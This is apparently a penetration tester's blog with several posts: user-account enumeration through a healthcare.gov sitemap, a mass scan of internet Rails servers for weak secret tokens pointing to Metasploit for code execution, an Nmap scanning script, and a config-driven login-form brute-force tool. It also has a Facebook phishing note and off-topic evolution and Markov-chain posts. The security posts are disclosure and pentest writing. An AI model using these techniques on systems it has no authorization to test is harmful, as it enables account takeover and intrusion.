On Robots and Sitemaps

Robots.txt and Sitemap.xml files are extremely useful when managing web crawlers but they can also be dangerous when they give away too much information. So what are these files and how are they used?

Many years ago, web site owners and web crawlers developed a method to allow web site owners to politely ask web crawlers not to crawl certain portions of a site. This is done by defining a robots.txt file (Robots Exclusion Standard). For the most part, this standard is adhered to by web crawlers.

A typical robots.txt file looks like this.

#Google Search Engine Robot
User-agent: Googlebot
Allow: /?_escaped_fragment_

Allow: /search?q=%23
Disallow: /search/realtime
Disallow: /search/users
Disallow: /search/*/grid

Disallow: /*?
Disallow: /*/followers
Disallow: /*/following

Disallow: /account/not_my_account

#Yahoo! Search Engine Robot
User-Agent: Slurp
Allow: /?_escaped_fragment_

Allow: /search?q=%23
Disallow: /search/realtime
Disallow: /search/users
Disallow: /search/*/grid

Disallow: /*?
Disallow: /*/followers
Disallow: /*/following

Disallow: /account/not_my_account

This is a portion of Twitter’s robots.txt file. Notice how Twitter tells the search engines which portions of the site are allowed to be crawled and not allowed to be crawled.

Tonight, while surfing the web I found this robots.txt file. I’ll let you guess which site it goes to.

Sitemap: http://data.healthcare.gov/sitemap-data.healthcare.gov.xml

Notice that there are no Disallow directives. Based on the accepted convention, the web site owner gives all web robots permission to crawl the entire site. Theoretically, you could write your own robot and legally crawl the entire site.

Along with the agreement to use robots.txt files, web site owners and web crawlers also decided to use a sitemap.xml file to explicitly define the structure of the web site and the URLs “on a website that are available for crawling” (Sitemaps). The Sitemap directive can be added to the robots.txt file to tell web crawlers where to find the sitemap file.

If we look at the sitemap for data.healthcare.gov we can see the URLs, which by convention, we are EXPECTED to crawl or visit as users.

<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">

This sitemap file tells us about two additional sitemap files. The sitemap-users-data.healthcare.gov0.xml file looks interesting.

<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">

This sitemap file tells us the profile link for a number of user accounts. In fact, it provides links to approximately 3900 user accounts. Again, based on convention, robots are EXPECTED to visit each of these links and download the page at the link. You can see that Google did exactly this by running this query.

So, let’s download a page. When you visit a page in a browser, the page is downloaded and rendered by the browser. When a robot or search engine downloads the page they read and parse the HTML code that makes up the page. To see this HTML code, you can right-click on the page in your browser and choose View Source, or something similar depending on your browser. The source code looks like this.


Note, the source code is full of links to other portions of the data.healthcare.gov site, which, by convention, we are allowed to crawl because the robots.txt file does not define any disallowed portions of the site. One such link, /api/users/ta6q-868x?method=contact, is found about 1/3 of the way down the page. Visiting this page produces an error message in JSON format, which means a web crawler like Google will likely ignore this page.

  "code" : "method_not_allowed",
  "error" : true,
  "message" : "GET not allowed"

On a more serious note, a typical attack against websites includes enumerating user accounts and then attempting to brute-force the associated password. Typically, an attacker has to work to find a method to enumerate user accounts but in this case the sitemap file provides a list of user accounts. Personally, I think it would be wise to remove the sitemap file at http://data.healthcare.gov/sitemap-users-data.healthcare.gov0.xml.

Finding Weak Rails Security Tokens

The other day I was reading about the dangers of having your Rails secret token in your version control system. The TL;DR version is secret tokens are used to calculate the HMAC of the session data in the cookie. If you know the secret token you can send arbitrary session data and execute arbitrary code.

So I decided I’d go digging through Github to see if anyone had uploaded secret tokens to the site. Sure enough, there were more than a few secret tokens. This isn’t all bad because Rails allows different configuration settings in the same application depending on whether the app is in production or development and most of the Rails apps used a strong secret_token read from an environment variable or generated by SecureRandom for the production site but a weak secret_token for development the site.

I took a few minutes to record the secret tokens I found and decided to see if I could find any of them in use on Internet facing sites. To test this I went to Shodan to find Rails servers and found approximately 70,000 servers. I downloaded the details for about 20,000 of those servers and looked at the cookies to identify the ones running Rails apps. Rails cookies are distinct because they consist of a base64 encoded string followed by a — and then a HMAC of the base64 string. This gives a cookie, which looks like this.


Of the roughly 20,000 Rails servers, for which I had details, only about 10,000 had cookies that matched the pattern above.

The digest of the cookie is produced by calculating the HMAC of the base64 string using the SHA1 hashing algorithm and the secret token as the salt. To find the secret token we simply calculate the HMAC using each of the potential secret tokens as the salt and see if the calculated digest matches the digest in the cookie. Of the approximately 10,000 cookies, I was able to find 7 secret tokens. This is not very impressive at all but it gave me hope to try a larger test.

I decided to check the Alexa top 1 million web sites to see how many used a cookie with a digest, and for how many I could find the secret token. I’ve tested about 40,000 sites so far and have only found 303 sites that use a cookie that matches the pattern above. Of those 303 sites, I did not find any of the secret tokens. The results are not surprising and I realize this is a long shot that will probably come to nothing but sometimes you just have to test a theory. If I finish the testing I’ll update the blog post with the final stats.

Although I haven’t tried it yet, I believe that if you ran the same test on an internal network you would have more success because there is more likely to be development Rails servers on an internal network. If you’d like to try this on your network you can get the rails_find.py, rails_secret_token.py, and rails_secret_tokens.text files here. The rails_find.py script takes a list of host names or IP addresses and writes any matching cookies to a file. The rails_secret_token.py script takes a file of cookies and the rails_secret_tokens.txt file and tests each token against each cookie.

If you do find a secret token during your testing, Metasploit will get you remote code execution.


Introduction to Python

I did a quick presentation tonight for the Chattanooga Python Users Group.

Hack Yourself First: An Introduction to Penetration Testing

I will be teaching an introductory penetration testing class on December 14, 2013. If you are a system administrator in the Chattanooga area, check it out. You can get the syllabus for the class here, http://asgconsulting.co/static/files/hyf_syllabus.pdf

Will Write Code For Friends

The other day my friend Slade asked me to write a script to take an address range and run an Nmap ping scan against it and then run a SYN scan against only the live hosts using a predefined set of ports. Finally, he wanted a simple output showing the hosts and only the open ports. So, I put together this short Python script. The usage is below:


discover.py IP_addresses '

Addresses must be a valid Nmap IP address range and ports
must be a valid Nmap port list. Any ports provided will be
added to the default ports that are scanned: 21, 22, 23,
25, 53, 80, 110, 119, 143, 443, 135, 139, 445, 593, 1352,
1433, 1498, 1521, 3306, 5432, 389, 1494, 1723, 2049, 2598,
3389, 5631, 5800, 5900, and 6000. The script should be run
with root privileges.

The script uses the -oA switch to save the Nmap results for both the ping scan and the SYN scan. The gnmap file from the SYN scan is then parsed to produce a simple Markdown file that looks like this:

HP Officejet J4680 printer|HP PhotoSmart C390 or C4780; or
Officejet 6500, 7000, or 8500 printer|HP Photosmart C4500
or C7280, or Officejet J6450 printer

tcp/80 (open) - Virata-EmWeb 6.2.1 (HP Photosmart C4700
series printer http config)
tcp/ 139 (open) - tcpwrapped
tcp/ 445 (open) - netbios-ssn

Apple AirPort Extreme WAP or Time Capsule NAS device (NetBSD
4.99), or QNX 6.5.0

tcp/53 (open) - domain?

In addition to the discover.py script, I created the gnmap2md.py script which converts gnmap formatted files into Markdown formatted files. You can get it here.
As always, I hope you enjoy the script and let me know if you have any trouble with it.

Chattanooga Technology Meetup

This weekend we had a technology meetup at the 4thfloor in the downtown branch of the Chattanooga Library. We had a good turn out and I was able to talk about two of my favorite subjects, Python and infosec.

Here’s the presentation I gave on the Requests library for Python.

Multiprocessor HTML Login Form Brute Force

The other day I needed to brute force an HTTP basic auth login so I fired up Metasploit, as I usually do, and and tried to run the auxiliary/scanner/http/http_login module. The module crashed and printed out a stack trace. Instead of spending time troubleshooting it, I decided to throw together a quick Python script. So I used my multiprocessor SSH brute force script as a template and put together a multiprocessor basic auth script. Well the next day, I needed to brute force an HTML login form so I decided to write Python script to do that as well.

HTTP Basic Auth is quite easy to brute force because after the credentials are sent, the server responds with a 401 status code if they were the wrong credentials and either a 2xx or 3xx status code if they were correct. HTML login forms are much more difficult because there are often cookies that must be set and hidden fields that are included in the form, typically for CSRF purposes. In addition, the body of the server response must be parsed to determine if the login failed or succeeded. So, brute forcing an HTML login forms follows a pattern like this.

  1. GET the login page so that any needed cookies are set.
  2. Parse the login form for any hidden fields and associated values that must be sent in addition to the credentials.
  3. POST the login form with the credentials and any hidden fields.
  4. Parse the response to see if a login failure has occurred and to update the value of any hidden fields.

I built a script that can automate the process but it does require some manual intervention in the form of a configuration file. The configuration file can be seen below and is in JSON format. First, set the login URL and the action URL, this is where the form gets POSTed. Next, set the field name for the username and password and set the files that contain the list of usernames and passwords to try. Next, set the string of text that will be in the failure message and set the number of threads that should be used. Finally, define the names of any hidden fields that should be included in the login form.

	"login": "https://domain/login/url",
	"action": "https://domain/login/action",
	"ufield": "login",
	"pfield": "password",
	"ufile": "user",
	"pfile": "pass",
	"fail_str": "Some string that shows our login failed",
	"threads": "1",
	"hidden": [
		"hidden_field_name1", "hidden_field_name2"

The script will first GET the login page defined in the config file, set any necessary cookies, and parse the page for the values of the hidden fields defined in the config file. Next, the script POSTs the login credentials and the hidden fields with their values to the action page defined in the config file. Finally, the response is parsed to find the failure string and to update the value of any hidden fields. If the failure string is present in the response, the process is repeated with a new set of credentials. If not, the script will stop and print the credentials that succeeded.

The script and a sample configuration file can be downloaded from the Scripts repository on my GitHub account, https://github.com/averagesecurityguy/scripts. As always, let me know if you have any questions or trouble running the script.

Facebook WTF?

I do not use Facebook and after a few years, I finally convinced my wife to give it up. In my opinion, the social benefits of Facebook are far outweighed by the privacy and security concerns. To demonstrate, my father-in-law recently received a phishing message through facebookmail, see the screenshot below.


The email has all the typical signs of a phishing email including the bad grammar and the FUD meant to get you to click on the link. The only problem is the link is a legitimate Facebook URL. Confused, I fired up a VM and visited the link, which took me to this page.


The page appears to be a security warning with a URL at the bottom. I think most Facebook users would see this as normal and click Continue. In fact, the page is designed to let you know you are leaving Facebook to go to the displayed URL but the only indication that you are leaving Facebook is the title of the page.


I thought to myself, “That can’t be right, maybe a logged in user gets a different message”. So, I created an account and visited the link again. This time I got a warning message letting me know the link was potentially spammy.


Excellent, Facebook is watching out for it’s users and protecting them from spammy links. Not so fast. If you look at the phishing URL closely, you can see it has three parts: http://www.facebook.com/l/, a random string, and the redirect URL. I decide to make some changes to the phishing URL and see what would happen.

If you modify the random string the warning message is no longer displayed because Facebook doesn’t recognize this new URL as malicious. This means that Facebook is detecting the malicious link on the full URL and not on the redirected URL. Based on this, it seems that scammers could setup one site and create many different URLs to redirect to this one site and they would likely never be caught by Facebook.

To prevent problems With these type of links, Facebook should make it very clear that the user is leaving Facebook to go to a new site, a message in the page title is not enough. In addition, Facebook should determine if a link is “spammy” based on the destination URL not based on the original URL.

I reported this as a potential bug but Facebook didn’t seem to see it as a bug. Maybe I’m crazy, what do you think?

Why Evolution is True

I know this is off topic for this blog but it’s my blog so here goes. I was raised as a Christian, and still hold to the Christian faith. As a part of my upbringing I was always taught that evolution was not true. Not wanting to blindly believe this, I decided to learn more about it and see if the arguments for evolution stand to reason. With this end in mind I bought the book “Why Evolution is True” by Jerry A. Coyne and started reading it tonight. I have read the Preface, Introduction, and first chapter. Evolution, like many other scientific theories has been studied for over a hundred years by people much smarter than I so I don’t expect to read this book and be able to prove or disprove the arguments. My primary goal, for now, is to ask questions and once those questions have been satisfactorily answered, then draw my conclusions. With that in mind, these are some of my observations and questions from what I’ve read so far.

Chapter 1:
On pages 9 and 10, Dr. Coyne says,

“Matchbooks resemble the kinds of creatures expected under a creationist explanation of life. In such a case, organisms would not have common ancestry, but would simply result from an instantaneous creation of forms designed de novo to fit their environments. Under this scenario, we wouldn’t expect to see species falling into a nested hierarchy of forms that is recognized by all biologists.”

My question here is why does creation imply disorder. Is it not feasible for an entity that is powerful enough to create everything we know to also do it in an orderly manner? If creation was done in an orderly manner, why would we not expect to see a nested hierarchy of forms and similarities in DNA structure?

On page 11, Dr. Coyne says,

“Over time, the population will gradually become more and more suited to its environment as helpful mutations arise and spread through the population, while deleterious ones are weeded out.”

This would seem to imply that over the course of tens of thousands of years there were no drastic changes to the environment otherwise natural selection would not be able to keep up. Do other areas of science show these long periods of time with no drastic changes to the earth’s environment?

On page 18, Dr. Coyne says,

Imperfection is the mark of evolution, not of conscious design. We should then be able to find cases of imperfect adaptation, in which evolution has not been able to achieve the same degree of optimality as would a creator.”

This statement doesn’t seem to be provable and it also assumes that optimality is the ultimate goal of a creator. There is no reason that what we see as imperfection could not be purposely designed.

The next chapters get into the science behind evolution and I look forward to reading them. I hope to do additional blog posts as I move through the book.

PTArticlegen.com: Behind the Scenes

The other day I put up a site called ptarticlegen.com that creates a random penetration testing article using Markov chains. If you’ve never heard of a Markov chain, check out the Wikipedia article. Put simply, a Markov chain is generated by making a random choice based on the current state of a system and using that choice to determine the next state of the system. The current state of the system only depends on the previous state and not all the choices leading up to the previous state.

Markov chains can be used to generate sentences by taking a word pair and choosing the next word from a list of words that typically follow that word pair. But first, a set of source data has to be analyzed to find word pairs and create a list of words that typically follow those word pairs.

As an example consider these two sentences:
The fox jumped over the spoon.
The cow jumped over the moon.

The word pairs and the list of following words would look like this:

(The, fox) - [jumped]
(fox, jumped) - [over]
(jumped, over) - [the, the]
(over, the) - [spoon, moon]
(The, cow) - [jumped]
(cow, jumped) -[over]

If we use (The, fox) as our starting word pair we can generate the sentence, “The fox jumped over the moon” by making the following choices:

(The, fox) -> jumped
(fox, jumped) -> over
(jumped, over) -> the
(over, the) -> moon

To create the articles I wrote a Python script to analyze 600 sentences taken from my blog and then generate new sentences based on the analysis. I also used Python and web.py to create the web site. The Markov chain code I wrote is a modification of code from these two excellent resources. You can get the source code for ptarticlegen.com from my Github account.